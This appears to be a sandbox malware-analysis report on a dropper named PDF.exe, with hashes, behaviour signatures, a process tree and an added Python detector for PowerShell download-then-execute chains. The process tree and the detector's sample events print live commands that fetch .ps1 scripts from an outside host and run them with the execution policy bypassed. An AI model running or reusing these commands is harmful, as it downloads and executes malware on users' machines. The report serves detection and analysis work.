Resubmissions
submitted           sample ID            score
21/01/2025, 13:31   250121-qspexswjes    10
21/01/2025, 12:04   250121-n8tngasrhm    10
13/07/2024, 12:59   240713-p8a2ss1gpq    10

Analysis
max time kernel: 122s
max time network: 122s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 13/07/2024, 12:59
Static task: static1
Behavioral task: behavioral1, sample PDF.exe, resource win7-20240704-en
Behavioral task: behavioral2, sample PDF.exe, resource win10-20240404-en
Behavioral task: behavioral3, sample PDF.exe, resource win10v2004-20240709-en
General
Target: PDF.exe
Size: 258KB
MD5: 34c2047d0b69ba023b700c21431accc0
SHA1: e34c28611707c81565cb73d8a1a46dfc3ab2495a
SHA256: ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
SHA512: a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
SSDEEP: 6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted: http://thelustfactory.com/vns/1.ps1
Extracted: http://thelustfactory.com/vns/2.ps1
Signatures

Blocklisted process makes network request (6 IoCs)
flow  pid   process
5     2992  powershell.exe
6     2992  powershell.exe
7     2992  powershell.exe
9     2744  powershell.exe
10    2744  powershell.exe
11    2744  powershell.exe

HTTP links in PDF interactive object (1 IoC)
Detects HTTP links in interactive objects within PDF files.
resource                                     yara_rule
behavioral1/files/0x00060000000186f7-57.dat  pdf_with_link_action

Command and Scripting Interpreter: PowerShell
pid   process
2744  powershell.exe
2732  powershell.exe
2588  powershell.exe
2992  powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (1 IoC)
pid   process
2644  timeout.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
pid   process
1724  AcroRd32.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid   process
2992  powershell.exe
2744  powershell.exe
2732  powershell.exe
2588  powershell.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid   process
1724  AcroRd32.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description              pid   process
Token: SeDebugPrivilege  2992  powershell.exe
Token: SeDebugPrivilege  2744  powershell.exe
Token: SeDebugPrivilege  2732  powershell.exe
Token: SeDebugPrivilege  2588  powershell.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
pid   process
1724  AcroRd32.exe
1724  AcroRd32.exe
1724  AcroRd32.exe

Suspicious use of WriteProcessMemory (22 IoCs; identical consecutive entries collapsed, see count)
description                       pid   process  procid_target  count
PID 2516 wrote to memory of 2276  2516  PDF.exe  30             3
PID 2276 wrote to memory of 2992  2276  cmd.exe  32             3
PID 2276 wrote to memory of 2744  2276  cmd.exe  33             3
PID 2276 wrote to memory of 2732  2276  cmd.exe  35             3
PID 2276 wrote to memory of 2588  2276  cmd.exe  36             3
PID 2276 wrote to memory of 2644  2276  cmd.exe  37             3
PID 2276 wrote to memory of 1724  2276  cmd.exe  38             4
Processes

[1] C:\Users\Admin\AppData\Local\Temp\PDF.exe  (PID 2516)
    "C:\Users\Admin\AppData\Local\Temp\PDF.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe  (PID 2276)
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AEA7.tmp\AEA8.tmp\AEA9.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2992)
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2744)
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2732)
        powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2588)
        powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\timeout.exe  (PID 2644)
        timeout /t 5
        - Delays execution with timeout.exe

    [3] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe  (PID 1724)
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of SetWindowsHookEx
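The process tree above is a plain download-then-execute dropper chain: PDF.exe runs cmd.exe on an extracted batch file, two PowerShell instances fetch 1.ps1 and 2.ps1 into %APPDATA% with WebClient.DownloadFile, two more run those exact files with -ExecutionPolicy Bypass -File, then timeout.exe pauses and Adobe Reader opens pdf.pdf as a decoy. The signal worth alerting on is not "-ExecutionPolicy Bypass" alone (administrators use it routinely) but a PowerShell DownloadFile destination that is later passed to -File under the same parent. The Python below is an added detection example written for this page; it is not part of the tria.ge report or of the sample. The process-creation records are constructed to mirror the tree above (same PIDs and command lines), and the two trailing benign records are constructed to show what must not fire.

```python
"""Pair PowerShell DownloadFile drops with later -ExecutionPolicy Bypass -File runs.

Input: process-creation records (Sysmon event 1 / Security 4688 style fields).
The SAMPLE_EVENTS below are constructed for this example.
"""
import re
from dataclasses import dataclass

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record; events are assumed to be in creation order."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed records modelled on the report's process tree (PIDs mirror it).
# The last two records are constructed benign noise: a maintenance script run
# with -ExecutionPolicy Bypass, and a DownloadString that never drops a file.
SAMPLE_EVENTS = [
    ProcEvent(2516, 1000, r"C:\Users\Admin\AppData\Local\Temp\PDF.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\PDF.exe"'),
    ProcEvent(2276, 2516, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AEA7.tmp\AEA8.tmp\AEA9.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"'),
    ProcEvent(2992, 2276, POWERSHELL,
              "powershell -Command \"(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\\Users\\Admin\\AppData\\Roaming\\1.ps1')\""),
    ProcEvent(2744, 2276, POWERSHELL,
              "powershell -Command \"(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\\Users\\Admin\\AppData\\Roaming\\2.ps1')\""),
    ProcEvent(2732, 2276, POWERSHELL,
              r"powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1"),
    ProcEvent(2588, 2276, POWERSHELL,
              r"powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1"),
    ProcEvent(2644, 2276, r"C:\Windows\system32\timeout.exe", "timeout /t 5"),
    ProcEvent(1724, 2276, r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe",
              r'"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"'),
    ProcEvent(3001, 3000, POWERSHELL,
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(3002, 3000, POWERSHELL,
              "powershell -Command \"(New-Object Net.WebClient).DownloadString('https://example.invalid/x')\""),
]

# WebClient.DownloadFile(<url>, <dest>) with either quote style.
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dest>[^'\"]+)['\"]\s*\)",
    re.IGNORECASE)
# -ExecutionPolicy Bypass (or -ep Bypass) followed by -File <path>, quoted or bare.
EXEC_FILE_RE = re.compile(
    r"-(?:ExecutionPolicy|ep)\s+Bypass\b.*?-File\s+(?:\"(?P<qpath>[^\"]+)\"|(?P<path>\S+))",
    re.IGNORECASE)


def norm(path: str) -> str:
    """Case-fold and unify separators so the drop path and the -File path compare equal."""
    return path.strip('"').replace("/", "\\").lower()


def find_download_execute_chains(events):
    """Return one dict per (DownloadFile dest == later -File path) pair.

    Each dict carries the URL (a network IoC), the dropped path, both PIDs,
    whether both PowerShell instances share a parent, and the parent and
    grandparent images so the alert shows the launcher (here cmd.exe <- PDF.exe).
    """
    by_pid = {e.pid: e for e in events}
    downloads = {}  # normalised dest path -> (url, download event)
    chains = []
    for ev in events:
        if not ev.image.lower().endswith("powershell.exe"):
            continue
        m = DOWNLOAD_RE.search(ev.cmdline)
        if m:
            downloads[norm(m.group("dest"))] = (m.group("url"), ev)
            continue
        m = EXEC_FILE_RE.search(ev.cmdline)
        if not m:
            continue
        path = norm(m.group("qpath") or m.group("path"))
        if path not in downloads:
            continue  # Bypass -File of a file nothing downloaded: not this pattern
        url, dl = downloads[path]
        parent = by_pid.get(ev.ppid)
        grandparent = by_pid.get(parent.ppid) if parent else None
        chains.append({
            "url": url,
            "dropped": path,
            "download_pid": dl.pid,
            "exec_pid": ev.pid,
            "same_parent": dl.ppid == ev.ppid,
            "parent_image": parent.image if parent else None,
            "grandparent_image": grandparent.image if grandparent else None,
            "in_appdata": "\\appdata\\" in path,
        })
    return chains


def network_iocs(chains):
    """Sorted distinct download URLs, the equivalent of the report's Malware Config."""
    return sorted({c["url"] for c in chains})


if __name__ == "__main__":
    found = find_download_execute_chains(SAMPLE_EVENTS)
    for c in found:
        print(c)
    print(network_iocs(found))
```

Run against the constructed events the detector returns exactly the two chains in the tree (2992 then 2732 for 1.ps1, 2744 then 2588 for 2.ps1), both under cmd.exe with PDF.exe as grandparent, and the two URLs match the Malware Config section; the benign backup.ps1 run and the DownloadString call produce nothing. In production the same pairing works across hosts only if the records carry a host or session key, so add that to the lookup before deploying it.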
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 712B
MD5: 0e9ce5162ba7661c863a835f9d34d907
SHA1: 0b351312ab57a02857753cab2287da680955f40d
SHA256: b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA512: 8d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0

Filesize: 3KB
MD5: 70018b3d6b22d46b2265de57a80ea789
SHA1: 2d697e312c6302a704ea4b4a10f9a9a789459839
SHA256: 8af33d186d9e21b14177fa9cafb551cb64166f27d32b09dad7a39e91d4a24969
SHA512: 8aef07ab617ee137e5dc7af4adb3ebb2edf9f658883671ce01007e7c1b4e8feea4d1605b23419bf80a0ec52018325713375944135b31631579771f925ae39026

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 0b24a001f05c7457ecff8c90e07cd5ea
SHA1: 50f810e6c8e7ef4374084a95cc6996133ffb10af
SHA256: a29c20bd4a42291a3055b2c50a742bb36a3533ff71fe656843bd0483f5701ed8
SHA512: e52aae53a68fac634b2110b346c9afb1fac03ac08a3f3597b7def57b00a1e116060c12311f06a04e2a51824bcc3e419878f173017cabecc93c5a1aa31bd8b762

Filesize: 139KB
MD5: 5afaf79789a776d81ec91ccbdc9fdaba
SHA1: 6703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA256: 38c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA512: 09253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288